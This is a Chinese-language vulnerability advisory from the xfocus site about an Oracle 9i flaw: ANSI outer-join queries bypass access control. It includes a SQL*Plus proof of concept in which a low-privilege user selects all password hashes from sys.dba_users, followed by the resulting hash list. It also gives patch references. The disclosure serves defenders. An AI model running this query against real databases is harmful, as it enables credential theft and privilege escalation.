xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Oracle 9i ANSI Outer Join访问控制绕过漏洞


发布时间:2002-04-19
更新时间:2002-04-19
严重程度:
威胁程度:用户敏感信息泄露
错误类型:设计错误
利用方式:服务器模式

BUGTRAQ ID:4523

受影响系统
Oracle Oracle9i 9.0
Oracle Oracle9i 9.0.1
详细描述
Oracle 9i在SQL数据库查询中支持ANSI 'outer join'语法。

在这个实现上存在漏洞,包含'outer join'的SQL查询可以绕过数据库访问控制,可以导致用户获得原来不能访问的数据,如其他数据库用户密码散列信息。

测试代码
SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2

(c) Copyright 2001 Oracle Corporation.  All rights reserved.


Connected to:
Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
With the Partitioning option
JServer Release 9.0.1.1.1 - Production

SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;

User created.

SQL> Grant Create Session to us1;

Grant succeeded.

SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
  2  from sys.dba_users a left outer join sys.dba_users b on
  3  b.username = a.username
  4  ;

USERNAME                       PASSWORD
------------------------------ ------------------------------
SYS                            D4C5016086B2DC6A
SYSTEM                         D4DF7931AB130E37
DBSNMP                         E066D214D5421CCC
AURORA$JIS$UTILITY$            INVALID_ENCRYPTED_PASSWORD
OSE$HTTP$ADMIN                 INVALID_ENCRYPTED_PASSWORD
AURORA$ORB$UNAUTHENTICATED     INVALID_ENCRYPTED_PASSWORD
SCOTT                          F894844C34402B67
US1                            491AB9AB94D8A9EF
OUTLN                          4A3BA55E08595C81
ORDSYS                         7EFA02EC7EA6B86F
OLAPSVR                        AF52CFD036E8F425

USERNAME                       PASSWORD
------------------------------ ------------------------------
OLAPSYS                        3FB8EF9DB538647C
ORDPLUGINS                     88A2B2C183431F00
MDSYS                          72979A94BAD2AF80
CTXSYS                         71E687F036AD56E5
WKSYS                          69ED49EE1851900D
OLAPDBA                        1AF71599EDACFB00
QS_CBADM                       7C632AFB71F8D305
QS_ADM                         991CDDAD5C5C32CA
QS                             8B09C6075BDF2DC4
QS_WS                          24ACF617DD7D8F2F
HR                             6399F3B38EDF3288

USERNAME                       PASSWORD
------------------------------ ------------------------------
OE                             9C30855E7E0CB02D
PM                             72E382A52E89575A
SH                             9793B3777CD3BD1A
QS_ES                          E6A6FA4BB042E3C2
QS_OS                          FF09F3EB14AE5C26
RMAN                           E7B5D92911C831E1
QS_CB                          CF9CFACF5AE24964
QS_CS                          91A00922D8C0F146

30 rows selected.

SQL>

解决方案
补丁下载:

Oracle Oracle9i 9.0:
Oracle Oracle9i 9.0.1:

Oracle Patch 2121935
http://isupport.oracle.com
This fix is for supported releases of of Oracle9i, Releases 9.0.1.x.

相关信息
Pete Finnigan <pete@peterfinnigan.demon.co.uk>.
参考:http://online.securityfocus.com/archive/1/267845
http://otn.oracle.com/deploy/security/pdf/sql_joins_alert.pdf
相关主页:http://www.oracle.com/index.html
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved